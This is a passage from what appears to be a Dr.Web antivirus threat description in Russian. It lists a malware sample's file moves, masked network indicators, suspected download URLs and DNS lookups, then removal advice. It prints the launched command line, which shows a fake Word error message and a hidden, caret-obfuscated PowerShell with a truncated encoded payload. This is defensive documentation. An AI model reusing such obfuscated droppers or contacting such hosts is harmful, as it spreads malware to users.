%HOMEPATH%\d73hpgv\mogjtd6\k52m.dll в %WINDIR%\syswow64\iohnhnooktakr\miyqnulmmqcg.tnc
Подменяет следующие файлы
%HOMEPATH%\d73hpgv\mogjtd6\k52m.dll
Сетевая активность
Подключается к
'74.##.215.226':80
'24.##4.79.147':8080
TCP
Запросы HTTP GET
http://www.sh##tnr.xyz/wp-content/zBgK/
http://www.ta####dbackups.com/wp-includes/Dfp/
Запросы HTTP POST
http://24.###.79.147:8080/8fidtxani4qt1l6/3nfep306dz9setc26k/ via 24.##4.79.147
'th###nhmy.com':443
'ni####ogroms.com':443
'va#####ancountry.com':443
'ad###ght.com':443
UDP
DNS ASK th###nhmy.com
DNS ASK ni####ogroms.com
DNS ASK sh##tnr.xyz
DNS ASK va#####ancountry.com
DNS ASK ta####dbackups.com
DNS ASK ad###ght.com
Другое
Запускает на исполнение
'<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAkAEoAMQB3ACAAPQBbAFQAeQBwAGUAXQAoACIAewA2AH0AewAzAH0Ae...
'<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее